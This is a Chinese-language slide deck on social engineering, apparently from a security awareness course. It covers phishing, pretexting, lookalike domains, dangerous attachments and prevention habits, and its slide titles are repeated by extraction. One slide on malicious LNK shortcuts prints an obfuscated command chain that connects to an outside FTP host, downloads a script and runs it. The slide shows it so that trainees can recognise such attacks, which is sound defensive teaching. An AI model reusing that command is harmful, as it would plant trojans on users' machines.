如何防範社交工程的鄎阱 - personnel.pccu.edu.tw · 《駭客大騙局》 (the art of...

NII財團法人中華民國國家資訊基本建設產業發展協進會財團法人中華民國國家資訊基本建設產業發展協進會財團法人中華民國國家資訊基本建設產業發展協進會財團法人中華民國國家資訊基本建設產業發展協進會

如何防範社交工程的如何防範社交工程的如何防範社交工程的如何防範社交工程的陷阱陷阱陷阱陷阱

本簡報內容著作權為NII產業發展協進會所有，非經正式書面授權同意，不得將全部或部份內容，以任何形式變更、轉載、再製、散佈、出版、展示或傳播。

課程大綱課程大綱課程大綱課程大綱

資訊安全與社交工程1

何謂社交工程2

社交工程的攻擊手法3

如何預防社交工程攻擊4

問題與討論5


資訊安全概念資訊安全概念資訊安全概念資訊安全概念

�資訊安全的管理是建立在風險管理的基礎上.� 資訊安全不在於100%避免風險。

� 並非追求最小的風險。

�任何系統最薄弱的一環是人，安全警覺訓練是投資報酬率最高的安全對策。

�資訊安全、人人有責。

�進不來，拿不走，看不懂。

可接受的風險


社交工程的定義社交工程的定義社交工程的定義社交工程的定義

�利用人性弱點或利用人際之信任關係來進行詐騙，是一種非“全面”技術性的資訊安全攻擊方式，藉由人際關係的互動進行犯罪行為。

�網路世界的數位安全(Secrets & Lies: Digital Security in a Networked World)的作者Bruce Schneier曾提到所謂社交工程，全都是由人性方面，也就是利用所謂的”信任”來進行。

�駭客大騙局(The Art of Deception)的作者（Kevin Mitnick），更進一步的解釋到人類的天性就是很希望能幫助別人，因此也相當容易被欺騙。


社交工程方式社交工程方式社交工程方式社交工程方式

�早期社交工程是藉由電話或假扮身份問些看似無關緊要的問題等各種方法來獲取所需資訊。

�透過電子郵件進行攻擊之常見手法

� 假冒寄件者。

� 使用與業務相關或令人感興趣的郵件內容。

� 含有惡意程式的附件或連結。

� 利用應用程式之弱點(包括零時差攻擊)。


Social Engineering 社交工程社交工程社交工程社交工程

�最大的安全弱點：人

�利用心理學技巧-人性弱點、人際交往或互動特性所發展出來的一種攻擊方法。

�人性弱點：� 略施小惠(Reciprocation)� 使命必達(Consistency)� 同儕引力(Social Proof/Validation)� 投其所好(Liking)� 盲信權威(Authority)� 物稀為貴(Scarcity)


參考書參考書參考書參考書

《透視影響力──人類史上最詭譎、強大的武器總析解》(Influence: Science and Practice)作者：Robert B. Cialdini出版社：台灣培生教育出版股份有限公司

《駭客大騙局》

(The Art of Deception: Controlling the Human Element of Security)作者：Kevin D. Mitnick,

William L. Simon出版社：藍鯨

Secrets and Lies: Digital Security in a Networked World 作者：Schneier, Bruce出版社：John Wiley & Sons Inc




何謂社交工程2

3


問題與討論5

社交工程的攻擊手法


社交工程攻擊手法社交工程攻擊手法社交工程攻擊手法社交工程攻擊手法────人人人人

�偽裝內部員工

�偽裝重要人士

�偽裝第三方組織

�技術支援

�直接攻擊

� 圾圾翻找(Dumpster Diving)

� 偷窺強記(Shoulder Surfing)

� 尾隨(Piggybacking)


社交工程攻擊手法社交工程攻擊手法社交工程攻擊手法社交工程攻擊手法────電腦電腦電腦電腦

�廣告郵件/垃圾郵件

�郵件/即時通附檔

�偽造郵件

�釣魚網站


惡意郵件傳播方式惡意郵件傳播方式惡意郵件傳播方式惡意郵件傳播方式

�利用收信軟體漏洞

�欺騙使用者點擊

� 誘人話題

� 身份偽裝

� 檔案偽裝

� 魚叉式詐騙(spearing)


誘人話題誘人話題誘人話題誘人話題

�常用手法

� 通知民眾中獎、退稅等詐騙方式。

� 美女錯傳簡訊。

� 威脅恐嚇。

�人性

� 貪心：撿便宜的個性。

� 好奇：探索八卦訊息的個性。

� 不在意：沒那麼倒楣吧的想法。

� 警覺力：無所謂後果的嚴重性。

� 恐懼：寧可信其有，不可信其無。


人人人人…………生而雞婆生而雞婆生而雞婆生而雞婆，，，，死而八卦死而八卦死而八卦死而八卦


熱心地轉寄熱心地轉寄熱心地轉寄熱心地轉寄？？？？


貼心的叮嚀貼心的叮嚀貼心的叮嚀貼心的叮嚀？？？？

「實用」生活小資訊..…對駭客而言很實用


教您防帳號被盜用教您防帳號被盜用教您防帳號被盜用教您防帳號被盜用？？？？


讓人很想點開的郵件讓人很想點開的郵件讓人很想點開的郵件讓人很想點開的郵件


身份偽裝身份偽裝身份偽裝身份偽裝

�權威人士

� 警調人員、老闆

�支援單位

� 網管、顧問

�公正機構

� 「聯合信用卡中心」、「財金資訊股份有限公司」、銀行、郵局…

�廠商夥伴

� 下包商、經銷商、客戶

�親朋好友

� 情書

�恐嚇信

� 地下錢莊

� 通緝犯及其他刑案前科犯


惡意惡意惡意惡意Word文件文件文件文件


政治意圖政治意圖政治意圖政治意圖


附檔名附檔名附檔名附檔名com

看似一般網路轉寄郵件看似一般網路轉寄郵件看似一般網路轉寄郵件看似一般網路轉寄郵件


附檔名附檔名附檔名附檔名bat


附檔名附檔名附檔名附檔名ZIP,RAR,7z


附檔名附檔名附檔名附檔名LNK


LNK就是就是就是就是「「「「捷徑捷徑捷徑捷徑」」」」

�捷徑是一串DOS指令的集合

�此例中，這串指令執行了

�連接一個伺服器

�下載惡意程式(木馬程式)

�執行它！

%ComSpec% /c set h=p -&set j=ge&set s=.g03z.&echo echo o www%s%com^>t>b.bat&callb.bat&echo aa33>>t&echo bb33>>t&echo echo %j%t p p.vbs^>^>t>>c&echo echo bye^>^>t>>c&echo ft%h%s:t>>c&echo start p.vbs>>c&ren c h.bat&call h.bat&


各種惡意程式郵件範例各種惡意程式郵件範例各種惡意程式郵件範例各種惡意程式郵件範例

請問都是甚麼人請問都是甚麼人請問都是甚麼人請問都是甚麼人私人相片私人相片私人相片私人相片太妙太妙太妙太妙ㄌㄌㄌㄌ一定要看一定要看一定要看一定要看謎底謎底謎底謎底

超口愛超口愛超口愛超口愛ATMATMATMATM領錢時要注意領錢時要注意領錢時要注意領錢時要注意破解女王版破解女王版破解女王版破解女王版媽祖喜歡你媽祖喜歡你媽祖喜歡你媽祖喜歡你

新號碼新號碼新號碼新號碼我換信箱了囉我換信箱了囉我換信箱了囉我換信箱了囉極品空姐極品空姐極品空姐極品空姐投資明細投資明細投資明細投資明細

視窗化工具視窗化工具視窗化工具視窗化工具生日照片生日照片生日照片生日照片網路姊妹花網路姊妹花網路姊妹花網路姊妹花看看你和我誰智看看你和我誰智看看你和我誰智看看你和我誰智商高商高商高商高

魔獸開圖程式魔獸開圖程式魔獸開圖程式魔獸開圖程式聚會照片聚會照片聚會照片聚會照片美女裸照美女裸照美女裸照美女裸照籃球寶貝籃球寶貝籃球寶貝籃球寶貝

煎餃算命煎餃算命煎餃算命煎餃算命我女兒相片我女兒相片我女兒相片我女兒相片張柏芝張柏芝張柏芝張柏芝昨晚夢到你昨晚夢到你昨晚夢到你昨晚夢到你ㄌㄌㄌㄌ

星語專用視窗化星語專用視窗化星語專用視窗化星語專用視窗化從前的照片從前的照片從前的照片從前的照片陳冠希和鍾欣桐陳冠希和鍾欣桐陳冠希和鍾欣桐陳冠希和鍾欣桐床上照床上照床上照床上照

破解女王版破解女王版破解女王版破解女王版

這運動會否太累這運動會否太累這運動會否太累這運動會否太累小時候小時候小時候小時候ㄌㄌㄌㄌ照片照片照片照片2008200820082008年十二生肖年十二生肖年十二生肖年十二生肖運程運程運程運程

茱麗亞娜視窗第茱麗亞娜視窗第茱麗亞娜視窗第茱麗亞娜視窗第十三版十三版十三版十三版

yahoo!yahoo!yahoo!yahoo!回復郵件回復郵件回復郵件回復郵件同學會相片同學會相片同學會相片同學會相片春節禮物春節禮物春節禮物春節禮物潘金蓮與西門慶潘金蓮與西門慶潘金蓮與西門慶潘金蓮與西門慶


問題問題問題問題

�我們應該注意那些連結與附檔？

� Com

� ExE

� Scr

� Lnk

� Zip

� Bat


社交工程電子郵件的陷阱社交工程電子郵件的陷阱社交工程電子郵件的陷阱社交工程電子郵件的陷阱

�郵件中的遠端圖片下載（與ActiveX）

�郵件中惡意程式附檔與連結

遠端圖片下載

惡意程式附檔

惡意網頁連結


網路釣魚網路釣魚網路釣魚網路釣魚(Phishing)


釣魚郵件釣魚郵件釣魚郵件釣魚郵件

�利用誘人的內容欺騙使用者點擊到偽造網站。使用者輸入機密資料後，即遭竊。

�技術門檻低。

�利用使用者的粗心。

�申請與原本網站類似的網址。

�大部分使用者不會很注意上方網址。


網路釣魚網路釣魚網路釣魚網路釣魚

�網路釣魚（Phishing）是個特殊的英文專有名詞，結合“Phone”和“Fishing”兩個字，因為最初始是利用電話（Phone）來進行詐騙行為，所以用”Ph”來取代”F”，而創造了發音與”Fishing”相同的”Phishing”這個字。

�根據APWG(反網路釣魚工作小組)定義，網路釣魚(Phishing)是利用社交工程手法及技術性的詐騙手法，偽造e-mail或知名品牌網站(多為金融機構)，甚至是綁架網址的手法，來偷取使用者的身分資料及金融帳號等機密資料。

�根據美國消費者聯盟所做統計，網路詐騙案的被害金額從1999年每人平均310美元，增加到2000年的427美元，成長達137%。國內網路詐騙雖無金額統計，案件數量也有200%的年成長率。


典型的釣魚信典型的釣魚信典型的釣魚信典型的釣魚信

假的連結假的連結假的連結假的連結


魚目混珠魚目混珠魚目混珠魚目混珠


你分的出來嗎你分的出來嗎你分的出來嗎你分的出來嗎？？？？


你分的出來嗎你分的出來嗎你分的出來嗎你分的出來嗎?


你分的出來嗎你分的出來嗎你分的出來嗎你分的出來嗎?

http://www.microsoft.com

http://www.rnicrosoft.com


哪個才是無名小站哪個才是無名小站哪個才是無名小站哪個才是無名小站?

•http://www.wretch.cc/album/sky520sky/

•http://www.wretcn.cc/album/sky520sky/

•http://www.wretch-cc.com/album/sky520sky/


假亦真真亦假假亦真真亦假假亦真真亦假假亦真真亦假


用用用用APNIC網頁的查詢結果網頁的查詢結果網頁的查詢結果網頁的查詢結果…

中國電信集團


MSN也是社交工程的重要工具也是社交工程的重要工具也是社交工程的重要工具也是社交工程的重要工具


在離線狀態下在離線狀態下在離線狀態下在離線狀態下，，，，突然傳送一個連結突然傳送一個連結突然傳送一個連結突然傳送一個連結…

非本人所傳的連結，帳號密碼已遭盜用

這個人也是同樣點選了朋友所傳一樣的連結，而遭植入惡意程式，外洩了帳號密碼




何謂社交工程2

3


問題與討論5

社交工程的攻擊手法


網路社會趨勢分析網路社會趨勢分析網路社會趨勢分析網路社會趨勢分析

�更普及的數位化與網路化

�Web 2.0

�封閉網路走上開放網路

�電子商務盛行


46

社交工程容易成功的原因社交工程容易成功的原因社交工程容易成功的原因社交工程容易成功的原因

�員工人數眾多

�辦公地點眾多

�機關暴露組織架構

�缺乏安全訓練

�缺乏資訊分級體系

�缺乏事件通報/ 反應計劃


47

防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道~1�防火牆防火牆防火牆防火牆

�隨時更新作業系統安全漏洞、設定良好密碼、安裝防毒軟體、安裝防火牆。

�密碼密碼密碼密碼�使用一個易被猜測的密碼，就如同打開大門邀請小偷進來一樣，即使小偷闖入後沒有破壞任何東西，您的個人私密資料被看盡。

�密碼是保護電腦的第一道防線，密碼安全的四大守則：1. 不告訴任何人密碼（包括親人、職務代理人、上司等）。

�2. 不寫下密碼。

�3. 設定不容易被猜到的密碼。

�4. 一旦懷疑有人知道您的密碼，即刻更改。


48

防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道~2�軟體更新軟體更新軟體更新軟體更新

�軟體使用一段時間後通常會出現一些安全漏洞，這些漏洞也是駭客容易利用的弱點，隨時留意作業系統更新功能與不使用盜版軟體。

�病毒防範病毒防範病毒防範病毒防範�電腦病毒是一種故意設計來干擾電腦運作的程式，常見的干擾行為有破壞電腦檔案、重新格式化硬碟、使電腦效能變慢、上網時瀏覽器不斷打開新視窗，直到電腦資源被耗盡為止等。病毒的傳染途徑包括電子郵件、電腦遊戲，及任何從網路下載的檔案等。所以電腦必項安裝防毒軟體，並且定期更新病毒碼。


49

防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道~3�隨身碟的使用隨身碟的使用隨身碟的使用隨身碟的使用

�避免擺渡攻擊，駭客擺渡攻擊的方法，是由連結網路的電腦將autorun.inf與ghost.pif(惡魔程式)等擺渡木馬程式植入行動碟中，待行動碟與內部工作網進行資料交換時，擺渡木馬程式立刻感染內網電腦，再將欲竊取的資料下載至行動碟中。完成上述擺渡程序後，只要使用者再將行動碟連接網際網路電腦，被竊取的資料就會自動傳送給駭客。

公事家辦的後果


50

防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道~4�資料備份資料備份資料備份資料備份

�電腦硬碟容量越大，所儲存的資料量也越多，萬一發生硬碟損壞，資料將有遺失的風險，所以定期備份相當重要。

�網路紀錄網路紀錄網路紀錄網路紀錄（（（（cookie））））

記錄使用者瀏覽網頁的資訊、帳號與密碼，當使用者

下次再度使用瀏覽器時，使用者也無需重新輸入帳號與密碼。

�cookie紀錄重要的個人資料與網路使用習慣，應隨手刪除電腦裡的cookie紀錄。

�詳讀每個網站的隱私權政策，尤其是cookie所蒐集的使用者資訊用途，以避免個人資料被濫用。


51

防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道~4

�隱私權隱私權隱私權隱私權�避免將個人資訊公布在網路上。上網查詢資料、購物、聊天…，您在網路上的各種行為都可能被記錄與分析。另一方面，您自己也可能不小心將個人資料洩漏出去，例如填寫問卷、參加抽獎、加入會員等。

�垃圾郵件垃圾郵件垃圾郵件垃圾郵件�目前仍無法完全阻止垃圾郵件入侵，好的防範之道…

• 絕不回覆垃圾郵件….會讓散佈者知道您的信箱是有效的.

• 使用垃圾郵件過濾軟體。


52

防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道防範社交工程你必須知道~5

�即時通訊軟體即時通訊軟體即時通訊軟體即時通訊軟體�為了降低通訊成本與提高通訊效率，越來越多人和企業使用「即時通訊軟體」進行多方會議，或訊息與檔案交換等網路服務，但若您的電腦和個人資訊沒有適當的保護措施，使用即時通將有資安風險。

�公務電腦使用公務電腦使用公務電腦使用公務電腦使用� 組織內之電腦設備，

限公務用途使用，

禁止公、私電腦交互使用

，以免感染電腦病毒或

資料外洩之風險。


53

預防社交工程攻擊方式預防社交工程攻擊方式預防社交工程攻擊方式預防社交工程攻擊方式

�落實確認落實確認落實確認落實確認/ 授權程序授權程序授權程序授權程序�確認身分。

�確認在職狀況。

�確認對方有取得資訊的需求及權限。

�確實作好資訊資產分級確實作好資訊資產分級確實作好資訊資產分級確實作好資訊資產分級


54

預防社交工程攻擊方式預防社交工程攻擊方式預防社交工程攻擊方式預防社交工程攻擊方式~1

�教育訓練教育訓練教育訓練教育訓練�認識常見社交工程的可疑徵兆。

�了解並遵守組織安全政策與程序。

�演練、演練、再演練~~。�提升個人資安觀念。

98年5月/9月點閱熱門的郵件


當個人保全概念不足時當個人保全概念不足時當個人保全概念不足時當個人保全概念不足時……


去吃飯囉去吃飯囉去吃飯囉去吃飯囉~~

離開座位有記得把螢幕上鎖，好習慣！

但是你USB碟是要留下給誰？


57


�自我安全防護自我安全防護自我安全防護自我安全防護�個人電腦資訊安全管理。

�Windows更新。�Office更新。�病毒碼更新。

�開啟Outlook 垃圾信防堵功能。�開啟防火牆功能。


58


�個人電腦安全管理個人電腦安全管理個人電腦安全管理個人電腦安全管理�電腦開機設定保護密碼。

�重要資料使用加密措施，防止未經授權存取。

�定時備份重要資料於其它儲存媒體中，並予以妥善保存。

�定時更新密碼。

�將電子郵件軟體設定成「關閉預覽郵件」、「關閉自動圖片下載」及「以純文字模式」開啟郵件。

�不隨意開啟及轉寄與業務無關之電子郵件及網站。

�不要任意開啟、點閱不明來源信件，非公務相關、非公務主旨信件，請直接刪除。

�不隨意點選或下載非公務相關之電子郵件內連結與附件檔案。

�如收到可疑的電子郵件，應先與寄件者查證確認。

�善用密件收件人，確保收件人員之郵件帳號不被散播。


59

社交工程相關參考資料社交工程相關參考資料社交工程相關參考資料社交工程相關參考資料

�國家資通安全會報國家資通安全會報國家資通安全會報國家資通安全會報

�網路文官學院網路文官學院網路文官學院網路文官學院

http://elearning.nat.gov.tw/�資安管理-個人篇

�電腦病毒原理與防治

�資安案例分享_e-mail社交工程及防護

�資安案例分享_email社交工程及防護_AA認證版

�個人電腦基本防護設定

�個人電腦基本防護設定_AA認證版

如何防範社交工程的鄎阱 - personnel.pccu.edu.tw · 《駭客大騙局》 (the art of...

Documents